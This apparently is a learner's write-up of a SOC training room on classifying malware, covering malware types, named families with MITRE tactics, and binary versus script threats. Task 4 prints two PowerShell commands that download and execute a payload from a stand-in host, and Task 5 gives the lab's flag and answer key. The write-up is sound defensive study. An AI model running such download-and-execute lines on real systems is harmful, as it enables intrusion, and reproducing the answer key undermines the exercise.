Task 1 — Introduction Summary

Malware is software designed to damage systems, steal data, or provide unauthorized access. It comes in various forms, each with distinct tactics and objectives, impacting businesses through financial loss, data breaches, service disruption, and reputational damage.

In a Security Operations Center (SOC), analysts monitor security alerts and determine appropriate actions based on malware classification. Correctly identifying malware helps in decisions like isolating infected systems or investigating data exfiltration.

This task covers key malware categories, real-world examples, and the differences between binary (executable) and script-based threats.
Learning objectives include:

• Classifying malware based on behavior and purpose.
• Understanding real-world malware operations.
• Distinguishing between executable and script-based malware.
• Practicing malware classification.

Answer the questions: No Answer

Task 2 — Malware Types Summary

Understanding the main categories of malware and their behavior helps security analysts quickly identify threats and respond effectively. Malware can be classified into different types, each designed with a specific purpose and attack method.

Common Malware Categories

Scenario-Based Examples

• Adware: Pop-up ads appear even when no site is open; suspicious background program identified.
• Spyware: Personal emails accessed without consent; spyware recording keystrokes detected.
• Ransomware: Files encrypted, ransom note displayed; triggered by malicious email.
• Wiper: Servers crash, files overwritten randomly; no ransom demand.
• C2 Malware: Endpoint communicating with strange domains; allows remote attacker control.
• Data Stealer: Sensitive documents posted online; data exfiltrated by malware.
• Keylogger: Unauthorized bank transfers traced to a keylogger recording keystrokes.
• Cryptominer: System slowdown with constant high CPU and fan usage due to mining activity.

Question Answers

1. Cryptominer — Constant high CPU usage causing system slowdown.
2. Ransomware — Files encrypted and ransom demanded for unlocking.
3. Adware — Browser shows pop-ups with no data theft or encryption.
4. Data Stealer — Internal documents leaked online from malicious program.

Task 3 — Real-World Malware Examples Summary

Malware seen in the wild reflects real-world threats SOC analysts face regularly. Grouping malware into families — based on shared code or behavior — helps defenders apply effective detection and mitigation strategies.

Case Studies of Malware Families

• Spyware — Pegasus
  Targets mobile phones silently via crafted messages or vulnerabilities. Collects texts, location, emails, calls, and recordings.
  MITRE ATT&CK: TA0009 (Collection), TA0010 (Exfiltration)
• Ransomware — Akira
  Targets businesses, schools, and public services via phishing or remote access. Encrypts files and demands cryptocurrency ransom, sometimes threatening data leaks.
  MITRE ATT&CK: TA0040 (Impact), TA0011 (Command and Control)
• Wiper — Shamoon
  Overwrites files with junk data, disabling entire networks (not ransomware). Notable attack on Saudi Aramco.
  MITRE ATT&CK: TA0040 (Impact)
• Data Stealer — Agent Tesla
  Delivered via phishing attachments. Captures keystrokes, screenshots, credentials, and sends data to C2 servers.
  MITRE ATT&CK: TA0010 (Exfiltration)
• Keylogger — RedLine Stealer
  Acts as data stealer and keylogger. Collects keystrokes, browser cookies, cryptocurrency wallet info, sent to attacker.
  MITRE ATT&CK: TA0006 (Credential Access), TA0010 (Exfiltration)
• C2 RAT — QakBot (QBot)
  Initially a banking trojan, now a modular RAT used for credential theft, lateral movement, and loading ransomware (e.g., Black Basta). Delivered via phishing.
  MITRE ATT&CK: TA0011 (Command and Control), TA0002 (Execution), TA0006 (Credential Access)

Question Answers

1. Agent Tesla — Logs keystrokes, screenshots, and exfiltrates browser credentials.
2. Pegasus — Zero-click exploit installs spyware to monitor calls, messages, and location.
3. Akira — Ransomware family that threatens data leaks if ransom is not paid.
4. Shamoon — Wiper malware that overwrites files with junk data, targeting energy companies.

Task 4 — Binary vs Script Malware Summary

Malware typically arrives in two main forms: binary (compiled executables) and script-based. Understanding their differences helps SOC analysts better identify and respond to threats.

Binary Malware

• Delivered as compiled files like .exe (executables) or .dll (dynamic link libraries).
• Delivered via email attachments, malicious downloads, removable media, or as part of other infections.
• Can be disguised using misleading icons or hidden extensions (e.g., invoice.pdf.exe).
• Identifiable by static checksums (e.g., MD5 hashes) or hardcoded strings/byte patterns.
• Generally more stable and supports complex payloads.

Script-Based Malware

• Written in scripting languages like JavaScript (.js), PowerShell (.ps1), Visual Basic Script (.vbs), or batch files (.bat).
• Commonly delivered via email attachments (with macros), malicious websites, or embedded in Office documents.
• Allows attackers to execute code directly in memory without writing to disk.
• Warning signs of malicious scripts:
• Downloads or executes other files.
• Modifies system settings or disables security tools.
• Executes encoded/obfuscated commands.
• Unexpectedly launches CMD or PowerShell.

Example Commands

• Batch script:

powershell -Command "Invoke-WebRequest http://malicious.site/payload.exe -OutFile C:\Users\Public\payload.exe"  start C:\Users\Public\payload.exe

• PowerShell script:

powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"

Obfuscation Example

• The LummaStealer uses obfuscated data stored in a large variable, which is base64-decoded and executed in memory using a .NET assembly — helping avoid leaving files on disk.

Question Answers

1. PowerShell — Frequently used by script-based malware to download payloads.
2. .bat — Another file extension commonly associated with script-based malware (batch scripts).
3. Binary Malware — More likely to leave identifiable byte patterns used by antivirus software.

Task 5:Practical

What is the flag?

THM{Malwar3_cl4ss1fication_p4ss3d}

Task 6 — Conclusion Summary

Malware remains one of the most common and dangerous threats that security defenders face. Proper classification of malware improves detection, investigation, and incident response capabilities. In this room, learners explored:

• The key malware types and their behaviors in real-world scenarios, such as Spyware, Ransomware, Wipers, Keyloggers, Data Stealers, Cryptominers, and Command and Control (C2) Malware.
• The concept of malware families, helping to apply known defenses based on shared origins or behaviors.
• The differences between binary (compiled executables) and script-based malware, along with their delivery methods (e.g., email attachments, malicious websites).
• Practical skills in identifying indicators of compromise (IoCs) like abnormal processes, network connections, high CPU usage, and suspicious file modifications.

Key Takeaways

• How to effectively identify and classify common malware types.
• How malware behaves and spreads during real-world attacks.
• How to distinguish between binaries and scripts in malware analysis.
• Practical application of classification skills in a simulated SOC environment using alert analysis.

The completion of this lab demonstrates an improved ability to classify and respond to malware incidents accurately.